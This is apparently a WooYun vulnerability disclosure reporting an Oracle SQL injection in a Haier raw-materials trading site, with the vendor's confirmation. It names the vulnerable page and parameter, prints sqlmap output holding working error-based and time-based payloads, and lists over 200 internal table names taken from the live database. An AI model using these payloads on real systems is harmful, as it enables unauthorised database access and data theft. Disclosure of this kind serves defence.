当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089303

漏洞标题:海尔集团重要分站Oracle注入

相关厂商:海尔集团

漏洞作者: 淡蓝色の忧伤

提交时间:2014-12-30 16:59

修复时间:2015-02-13 17:00

公开时间:2015-02-13 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-30: 细节已通知厂商并且等待厂商处理中
2014-12-31: 厂商已经确认,细节仅向厂商公开
2015-01-10: 细节向核心白帽子及相关领域专家公开
2015-01-20: 细节向普通白帽子公开
2015-01-30: 细节向实习白帽子公开
2015-02-13: 细节向公众公开

简要描述:

海尔大宗原材料购销平台

详细说明:

首页.png


漏洞页面
http://dzll.haier.net:8888/providerUnlock.jsp
post 参数 "procode=1"
dba权限哦

注入.png


17数据库.png


sqlmap identified the following injection points with a total of 175 HTTP(s) req
uests:
---
Place: POST
Parameter: procode
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: procode=1' AND 3366=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113
)||CHR(113)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (3366=3366) THEN 1
 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(106)||CHR(120)||CHR(113)||CHR(6
2))) FROM DUAL) AND 'Vbzc'='Vbzc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: procode=1' AND 6134=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(98)||CH
R(79)||CHR(81),5) AND 'xOtq'='xOtq
---
[10:25:53] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times
[10:25:53] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\dzll.haier.net'

漏洞证明:

| BD_TASK_ZC                     |
| BD_VOUCHER                     |
| BD_VOUCHER_20130129            |
| BD_VOUCHER_20141204            |
| BD_VOUCHER_CANCEL              |
| BD_VOUCHER_TEMP_0116           |
| BD_VOUCHER_TEST                |
| BOM_CY                         |
| BOM_CY_SELECT                  |
| BOM_JC                         |
| BOM_JC_SELECT                  |
| BOM_JC_TEMP                    |
| BOM_MATERIAL                   |
| BOM_OUT                        |
| CD_AGENT_PRICE                 |
| CD_ALERT_TIME                  |
| CD_BOM                         |
| CD_BOM_COMMIT                  |
| CD_BOM_COMMIT_BAK              |
| CD_BOM_TEMP                    |
| CD_CANCEL_CONDITION_1          |
| CD_CANCEL_CONDITION_2          |
| CD_CANCEL_CONDITION_3          |
| CD_CANCEL_CONDITION_4          |
| CD_CANCEL_PL                   |
| CD_CANCEL_PLANT                |
| CD_CHAYI_KIND                  |
| CD_CHAYI_PL                    |
| CD_CIPC_SPEC_STOCKGROUP        |
| CD_CODEFILE                    |
| CD_COMPONENT                   |
| CD_CURR_RATE                   |
| CD_CURR_TYPE                   |
| CD_CUSTOMER                    |
| CD_CUSTOMER_SPECIAL            |
| CD_CUSTOMER_SPECIAL_R3         |
| CD_DEPT_PLANT                  |
| CD_EPG_CUSTOMERS               |
| CD_FACTORY                     |
| CD_FACTORY_BAK                 |
| CD_FACTORY_EPG                 |
| CD_FACTORY_R                   |
| CD_FACTORY_R3                  |
| CD_FUTURE_PRICE                |
| CD_GVS_R3_COMPONY              |
| CD_GVS_R3_COMPONY_DZLL         |
| CD_GVS_R3_CUSTOMER             |
| CD_GVS_R3_FACTORY              |
| CD_HALF_BOM                    |
| CD_HALF_PURCHASE               |
| CD_HALF_PURCHASE_BAK           |
| CD_IDOC_TYPE                   |
| CD_MATERIAL                    |
| CD_MATERIAL_IMPORT             |
| CD_MATERIAL_MART_PRICE         |
| CD_MATERIAL_MODELS             |
| CD_MATERIAL_PRICE              |
| CD_MATERIAL_WASTE              |
| CD_MATERIAL_WASTE_B            |
| CD_NEW_LIMIT                   |
| CD_PLANT_COMPANY               |
| CD_PURCHASE                    |
| CD_REASON                      |
| CD_RETURN_PROPORTION           |
| CD_SAFE_STOCK                  |
| CD_SAP_IDOC_STATUS             |
| CD_STEEL_KIND                  |
| CD_STEEL_KIND_PRINT            |
| CD_STEEL_OVER                  |
| CD_STOCK_SENDER                |
| CD_STOCK_SENDER_20100919       |
| CD_STOCK_SENDER_OUT            |
| CD_STOCK_USER                  |
| CD_STOCK_USER_1                |
| CD_STOCK_USER_2                |
| CD_SUPPLIER                    |
| CD_SUPPLIER_BACKUP20071229     |
| CD_SUPPLIER_BUDGET             |
| CD_SUPPLIER_BUDGET_BAK         |
| CD_SUPPLIER_CANCEL             |
| CD_SUPPLIER_GUARANT            |
| CD_SUPPLIER_GUARANT_BAK        |
| CD_SUPPLIER_PO_PLANT           |
| CD_SUPPLIER_PR_LIMIT           |
| CD_SUPPLIER_QUESTION           |
| CD_SUPPLIER_R3                 |
| CD_SYB                         |
| CD_TEMP                        |
| CHENCHEN_CHAJIA                |
| CHENCHEN_FAHUO                 |
| CHENCHEN_SHOUHUO               |
| CLOSE_NEW_LIST                 |
| CUIJUAN                        |
| EP_BULLEINT_AFFIX              |
| EP_BULLETIN                    |
| EP_BULLETIN_CAT                |
| EP_BULLETIN_CATMANAGE          |
| HAIER_STOCK                    |
| HALF_COMPONENT_PO_DATA         |
| HGVS_STOCK_CHANGE_RESULT       |
| HX_DETAIL                      |
| HX_DETAIL_20071112             |
| HX_DETAIL_20071127             |
| HX_ERROR                       |
| HX_LOG                         |
| HX_LOG1                        |
| HX_LOG_TEST                    |
| KK                             |
| LOGIN_LOG                      |
| LOGON_TABLE                    |
| MD_CONDITION                   |
| MD_MODULE                      |
| MD_PERSON_FRAME                |
| MD_PERSON_HOMEPAGE             |
| MD_PERSON_MODULE               |
| MD_SYSTEM                      |
| MD_USER                        |
| MTEST                          |
| NAME                           |
| NEED_LOCK_ALERT                |
| OA_CONFIG_TAB                  |
| OA_KEYS_TAB                    |
| OA_PUBINFO_GRP                 |
| ORG_DEPT                       |
| ORG_DUTY                       |
| ORG_EMPLOYEE                   |
| ORG_ENTRY                      |
| ORG_ENTRY2                     |
| ORG_ENTRYINFO                  |
| ORG_ENTRY_20101130             |
| ORG_ENTRY_AWAY                 |
| ORG_ENTRY_CANCEL               |
| ORG_PASSWORD_HISTORY           |
| ORG_RIGHTLIST                  |
| ORG_UGRELATION                 |
| ORG_USERRIGHTLIST              |
| PBCATCOL                       |
| PBCATEDT                       |
| PBCATFMT                       |
| PBCATTBL                       |
| PBCATVLD                       |
| PLAN_TABLE                     |
| PO_TASK_TEST                   |
| PO_TEST                        |
| PROBLEM_NEW_TASK_RIGTH         |
| PR_TEST                        |
| QUEST_SL_TEMP_EXPLAIN1         |
| REQUEST_TEMP                   |
| RP_PRICE_CHANGE                |
| SAP_BOM_DATA                   |
| SAP_BOM_DATA_TEMP              |
| SAP_COMPONENT_PO_DATA          |
| SAP_CUSTOMER_DATA              |
| SAP_DELIVER_POST               |
| SAP_DELIVER_POST_NEW           |
| SAP_INFO_RECORD                |
| SAP_INFO_RECORD_FALSE          |
| SAP_LOG                        |
| SAP_MATERIAL_DATA              |
| SAP_MONEY                      |
| SAP_MONEY070407                |
| SAP_MONEY_BAK                  |
| SAP_MONEY_TEMP_HGVS            |
| SAP_MONEY_TEMP_HGVS_20080108   |
| SAP_MONEY_TEMP_HGVS_BAK        |
| SAP_MONEY_TEMP_R3              |
| SAP_MONEY_TEMP_R3_20080108     |
| SAP_MONEY_TEMP_R3_BAK          |
| SAP_ONWAY_PO                   |
| SAP_ONWAY_PO_BACKUP            |
| SAP_PARA                       |
| SAP_PARA_R3                    |
| SAP_PINGZHENG_DATA             |
| SAP_PINGZHENG_DATA_20141204    |
| SAP_PINGZHENG_DATA_A           |
| SAP_PINGZHENG_DATA_B           |
| SAP_PINGZHENG_DATA_C           |
| SAP_PINGZHENG_DATA_D           |
| SAP_PINGZHENG_DATA_E           |
| SAP_PINGZHENG_DATA_TEST        |
| SAP_PLAN_DATA                  |
| SAP_PO_DATA                    |
| SAP_PR_INFO                    |
| SAP_RFC_STAT                   |
| SAP_STOCK_INFO                 |
| SAP_SUPPLY_DATA                |
| SAP_SUPPLY_LINK                |
| SI_BASE_INFO                   |
| SI_BUYERFORM_PLANT             |
| SI_COMPONENT_PRICE             |
| SI_COMP_CHANGED                |
| SI_JGPRICE_DETAIL              |
| SI_MARGIN                      |
| SPECIAL_MATERIAL_TEMP          |
| SQL_PARA                       |
| STOCK                          |
| SUPPLY_STOCK                   |
| SUTEST                         |
| SU_DUIYING                     |
| SYS_SEQUENCE                   |
| SYS_SEQUENCE_1                 |
| TASK_CANCEL_TEMP               |
| TB_SYSTEM_JOB_INFO             |
| TEMP_BD_TOCK_RECORD            |
| TEMP_SUPPLIER_STOCK_20060304   |
| TEMP_ZHANGCHI_IMPORT           |
| TEST                           |
| TEST_110506                    |
| TEST_A                         |
| TEST_AAA                       |
| TEST_ABC                       |
| TEST_B                         |
| TEST_DETAIL                    |
| TMP_MATERIAL_MIN_PKG           |
| TOAD_PLAN_TABLE                |
| T_IDM_USER                     |
| T_PRC_DO_LOG                   |
| T_USER                         |
| T_USER_20100823                |
| T_USER_20101018                |
| UNLIMIT_TEMP                   |
| UP_CODE                        |
| USERCOMPARE                    |
| VOUCHER_JISUAN                 |
| VOUCHER_JISUAN_2               |
| VOUCHER_JISUAN_3               |
+--------------------------------+

修复方案:

你懂的。

版权声明:转载请注明来源 淡蓝色の忧伤@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-12-31 17:30

厂商回复:

谢乌云平台 淡蓝色の忧伤 的测试与提醒,我方已安排人员进行处理。

最新状态:

暂无

漏洞评价:

评论